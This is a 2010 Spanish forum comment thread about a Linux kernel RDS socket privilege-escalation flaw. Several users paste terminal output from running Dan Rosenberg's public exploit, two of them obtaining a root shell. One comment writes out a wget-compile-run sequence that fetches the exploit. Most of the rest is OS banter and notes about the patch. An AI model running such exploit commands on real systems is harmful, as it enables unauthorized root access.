Menéame: comentarios [1079515]

#37 Grave vulnerabilidad del kernel linux

--87883-- — Thu, 28 Oct 2010 17:05:49 +0000

A #1 le tienen que estar pitando los oídos por tanto uname -a.

» autor: --87883--

#36 Grave vulnerabilidad del kernel linux

--136659-- — Thu, 28 Oct 2010 16:58:53 +0000

Arch Linux i686 (32 bits):

[samuel@wind test]$ gcc -o rds linux-rds-exploit.c
[samuel@wind test]$ ./rds
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_ioctl to 0xf80db000
[+] Resolved commit_creds to 0xc1065030
[+] Resolved prepare_kernel_cred to 0xc10653d0
[*] Failed to resolve kernel symbols.
[samuel@wind test]$ uname -a
Linux wind 2.6.35-ARCH #1 SMP PREEMPT Wed Sep 29 07:17:20 UTC 2010 i686 Intel(R) Atom(TM) CPU N270 @ 1.60GHz GenuineIntel GNU/Linux

» autor: --136659--

#35 Grave vulnerabilidad del kernel linux

--136659-- — Thu, 28 Oct 2010 16:50:15 +0000

Arch Linux:

[samuel@phenom exploit]$ gcc -o rds linux-rds-exploit.c
[samuel@phenom exploit]$ ./rds
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_ioctl to 0xffffffffa0f2a000
[+] Resolved commit_creds to 0xffffffff81078030
[+] Resolved prepare_kernel_cred to 0xffffffff81078470
[*] Failed to resolve kernel symbols.
[samuel@phenom exploit]$ uname -a
Linux phenom 2.6.35-ARCH #1 SMP PREEMPT Wed Sep 29 08:45:18 CEST 2010 x86_64 AMD Phenom(tm) II X3Â710 Processor AuthenticAMD GNU/Linux

» autor: --136659--

#34 Grave vulnerabilidad del kernel linux

genteta — Thu, 28 Oct 2010 16:47:31 +0000

vaya... a tardado más salir la noticia en meneame, que aparecer el parche en la actualización de mi openSuSE.

» autor: genteta

#33 Grave vulnerabilidad del kernel linux

--89367-- — Thu, 28 Oct 2010 16:26:01 +0000

Yo uso Linux, Mac y Windows, y estoy hasta los huevos de fanboys de Linux, de Apple y de Microsoft (aunque de estos últimos hay menos). A ver: exploits para llegar a root han salido ya unos cuantos, creo que uno sonado fue en 2008, y algunos servidores Linux fueron explotados en remoto (porque el administrador no actualizó a tiempo, claro). Por otro lado, tampoco conozco a ningún usuario de Windows que actualice (también se puede actualizar selectivamente, #2), use antivirus y un poco de sentido común y haya tenido problemas.
Así que, entre sistema operativo y administrador: ¿cuál de los dos es el factor predominante, y con diferencia, de cara a la seguridad?

» autor: --89367--

#32 Grave vulnerabilidad del kernel linux

--87883-- — Thu, 28 Oct 2010 16:23:33 +0000

#7 Que skynet sea invulnerable nos va a dar muchos problemas a largo plazo. Ya lo verás.

» autor: --87883--

#31 Grave vulnerabilidad del kernel linux

--25105-- — Thu, 28 Oct 2010 15:26:42 +0000

Pan y linux

» autor: --25105--

#30 Grave vulnerabilidad del kernel linux

PythonMan8 — Thu, 28 Oct 2010 08:41:52 +0000

#24 no hay mejor coche sino mejor conductor, pero a falta de buenos conductores prefiero un mercedes con ABS y ESP (linux) que un panda con frenos de tambor (Windows).

» autor: PythonMan8

#29 Grave vulnerabilidad del kernel linux

--77349-- — Thu, 28 Oct 2010 08:28:56 +0000

[Usuario deshabilitado]

» autor: --77349--

#28 Grave vulnerabilidad del kernel linux

difusion — Wed, 27 Oct 2010 13:17:01 +0000

en fedora x64

[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xffffffffa044d680
[+] Resolved rds_ioctl to 0xffffffffa0447000
[+] Resolved commit_creds to 0xffffffff8106b731
[+] Resolved prepare_kernel_cred to 0xffffffff8106b619
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
sh-4.1# uname -a
Linux 2.6.34.7-61.fc13.x86_64 #1 SMP Tue Oct 19 04:06:30 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux
sh-4.1# whoami
root

» autor: difusion

#27 Grave vulnerabilidad del kernel linux

--175143-- — Wed, 27 Oct 2010 10:16:37 +0000

#25 Yo no estoy comparando vulnerabilidades solo digo que para criticar por criticar el hecho de que haya o no haya parche es irrelevante.

» autor: --175143--

#26 Grave vulnerabilidad del kernel linux

albandy — Wed, 27 Oct 2010 09:41:59 +0000

Os paso un video de la prueba que acabo de realizar del exploit. Evidentemente no ha funcionado.
www.youtube.com/watch?v=4kMZ7VBFOJw

» autor: albandy

#25 Grave vulnerabilidad del kernel linux

precision220 — Wed, 27 Oct 2010 08:13:19 +0000

#2 Hay una gran diferencia. Eso es una vulnerabilidad local, no remota como era la de LSSAS de windows

» autor: precision220

#24 Grave vulnerabilidad del kernel linux

--8737-- — Wed, 27 Oct 2010 07:58:03 +0000

No hay mejor sistema, sino mejor administrador.

» autor: --8737--

#23 Grave vulnerabilidad del kernel linux

utopio — Wed, 27 Oct 2010 05:07:27 +0000

El articulo es de hace 6 días, la solución subida al repo del kernel hace 12 días, asi que igual nuestros sistemas ya están parcheados y ni si quiera nos hemos dado ni cuenta, pero en una ubuntu 10.04 32bits(pae) no funciona...

Ubuntu 10.04 32bits (PAE, si PAE, ¿soy el único que lo debe usar, y qué?)

./check
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xf86e79c0
[+] Resolved rds_ioctl to 0xf86e1090
[+] Resolved commit_creds to 0xc01763d0
[+] Resolved prepare_kernel_cred to 0xc0176710
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Exploit failed to get root.

uname -a
Linux atomico 2.6.32-25-generic-pae #45-Ubuntu SMP Sat Oct 16 21:01:33 UTC 2010

...

» autor: utopio

#22 Grave vulnerabilidad del kernel linux

--213487-- — Wed, 27 Oct 2010 00:38:46 +0000

Ubuntu 10.04 64bits

:~$ ./exploit
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xffffffffa04216c0
[+] Resolved rds_ioctl to 0xffffffffa041a000
[+] Resolved commit_creds to 0xffffffff8108a1e0
[+] Resolved prepare_kernel_cred to 0xffffffff81089fa0
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Exploit failed to get root.

Una razón más para cambiarse a un sistema de 64 bits...

» autor: --213487--

#21 Grave vulnerabilidad del kernel linux

hurd — Wed, 27 Oct 2010 00:29:50 +0000

#20, #10

» autor: hurd

#20 Grave vulnerabilidad del kernel linux

--213487-- — Wed, 27 Oct 2010 00:25:32 +0000

#7 #11 y #15

Por lo que entendí de lo que dice Linus[1] es que en principio el problema sólo afecta a versiones del kernel de 32 bits... lo cual explica vuestros resultados.

[1] git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff

» autor: --213487--

#19 Grave vulnerabilidad del kernel linux

Hiawatha — Wed, 27 Oct 2010 00:25:18 +0000

Hoy le toca el turno a Linux de ser apuntado con el dedo y sufrir del trolling de los usuarios de Windows y OS X.

Jejeje. Estos se piensan que somos como ellos, que a la mínima que sale una noticia de un fallo de Windows se chotean del asunto, o a la mínima que sale una de OS X salen con los comentarios de "el sistema operativo de los pijos idiotas que se comprarían un cartón con una manzana pintada".

No hay sistemas operativos perfectos, está claro. Así que, a mejorarlos para al menos acercarnos a esa utópica perfección. Todos salimos ganando poco a poco

» autor: Hiawatha

#18 Grave vulnerabilidad del kernel linux

hurd — Wed, 27 Oct 2010 00:21:23 +0000

#17 Cada cosa en su momento

» autor: hurd

#17 Grave vulnerabilidad del kernel linux

ronko — Wed, 27 Oct 2010 00:18:32 +0000

#15 Venga, dilo, esto con hurd no pasaría. (Si se ve que te quedas con las ganas )

» autor: ronko

#16 Grave vulnerabilidad del kernel linux

naco46 — Wed, 27 Oct 2010 00:17:55 +0000

que gracioso, lo que en linux se trata de explotar (obtener cuenta root) en Windows XP venia por defecto (cuenta administrador).

» autor: naco46

#15 Grave vulnerabilidad del kernel linux

hurd — Wed, 27 Oct 2010 00:16:01 +0000

Ubuntu 10.04 - i686

luis ~/Desktop $ ./exploit
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xe0986a40
[+] Resolved rds_ioctl to 0xe0980000
[+] Resolved commit_creds to 0xc016c830
[+] Resolved prepare_kernel_cred to 0xc016cc80
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
#

Pues sí que funciona

» autor: hurd

#14 Grave vulnerabilidad del kernel linux

--55066-- — Wed, 27 Oct 2010 00:12:42 +0000

#12 www.kernel.org/ ?? Bugzilla solo recoge los bugs de la versión 2.6 en adelante (creo).

» autor: --55066--

#13 Grave vulnerabilidad del kernel linux

ronko — Wed, 27 Oct 2010 00:05:01 +0000

#7 Es curioso, en mis tiempos (nada que hoy estoy de abuelo cebolleta ) skynet lo usaba para nombre de dominio de active directory de prueba estudiando.

» autor: ronko

#12 Grave vulnerabilidad del kernel linux

ronko — Wed, 27 Oct 2010 00:03:16 +0000

Por cierto ya que estamos el sitio oficial lo que sería el "launchpad" para el kernel ¿cual es?.
¿Y Bugzilla no se dedica al kernel linux verdad? Al menos no lo veo claro en la wikipedia.

» autor: ronko

#11 Grave vulnerabilidad del kernel linux

vejeke — Wed, 27 Oct 2010 00:01:02 +0000

#7
Esto es lo que pasa en ubuntu 10.10 64bits 2.6.35-22-generic

wget www.vsecurity.com/download/tools/linux-rds-exploit.c
gcc linux-rds-exploit.c -o exploit
chmod +x exploit
./exploit

[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xffffffffa035f900
[+] Resolved rds_ioctl to 0xffffffffa0358000
[+] Resolved commit_creds to 0xffffffff810863b0
[+] Resolved prepare_kernel_cred to 0xffffffff81086880
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Exploit failed to get root.

No ha funcionado...

» autor: vejeke

#10 Grave vulnerabilidad del kernel linux

hurd — Tue, 26 Oct 2010 23:56:40 +0000

git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff

» autor: hurd

#9 Grave vulnerabilidad del kernel linux

ronko — Tue, 26 Oct 2010 23:55:44 +0000

#6 Para eso estamos los abuelos . (Me acabo de llamar viejales a mis 30 años)

» autor: ronko

#8 Grave vulnerabilidad del kernel linux

Remenad0r — Tue, 26 Oct 2010 23:55:03 +0000

#1 #2

A fix for this issue has been committed (git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff) by Linus Torvalds. VSR Security recommends that users install updates provided by downstream distributions or apply the committed patch and recompile their kernel.

» autor: Remenad0r

#7 Grave vulnerabilidad del kernel linux

Remenad0r — Tue, 26 Oct 2010 23:53:04 +0000

user@skynet ~ $ ./rds
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Could not open socket.

~ $ grep RDS /usr/src/linux/.config
# CONFIG_RDS is not set

Linux skynet 2.6.34.1 #1 SMP PREEMPT Sat Jul 17 11:48:22 UTC 2010 x86_64 Intel(R) Atom(TM) CPU 330 @ 1.60GHz GenuineIntel GNU/Linux

» autor: Remenad0r

#6 Grave vulnerabilidad del kernel linux

--55066-- — Tue, 26 Oct 2010 23:52:49 +0000

#3 Gracias, acabo de corregir el titular.

A veces uno acaba olvidando cosas tan antiguas como que el kernel fue linux y gnu todo lo demás

» autor: --55066--

#5 Grave vulnerabilidad del kernel linux

vejeke — Tue, 26 Oct 2010 23:51:27 +0000

#2 Cierto, también hay que tener en cuesta que este fallo no es explotable remotamente.

» autor: vejeke

#4 Grave vulnerabilidad del kernel linux

blabla28 — Tue, 26 Oct 2010 23:48:46 +0000

#2 si quieres comparar,espera a q haya miles de usuarios sufriendo un virus q aproveche el bug.

» autor: blabla28

#3 Grave vulnerabilidad del kernel linux

ronko — Tue, 26 Oct 2010 23:45:59 +0000

En el software libre no se esconden los errores y vulnerabilidades, de hecho se muestran, ya que ese es el objetivo para corregirlos y esto incluye el kernel linux del sistema operativo gnu/linux, por lo que menear esto, es como menear una entrada cualquiera del launchpad de ubuntu, o de debian bugs, o de bugzilla, ..., o del sitio para el seguimiento de bugs del kernel linux (sin el de) que además habrá varios sitios además de los de cada distribución.

» autor: ronko

#2 Grave vulnerabilidad del kernel linux

--175143-- — Tue, 26 Oct 2010 23:41:45 +0000

#1 No tan rápido. El parche del LSSAS de Windows salió antes de ningún sasser y aún así el choteo no se lo quitó nadie a Microsoft. Aunque claro, a la mayoría de usuarios de Windows la seguridad como que no les va mucho. Y si a eso le sumamos el "no actualizo que se me bloqueará por que es pirata..." pues ...

» autor: --175143--

#1 Grave vulnerabilidad del kernel linux

vejeke — Tue, 26 Oct 2010 23:37:28 +0000

Esperando actualización de seguridad en 3 2 1...

» autor: vejeke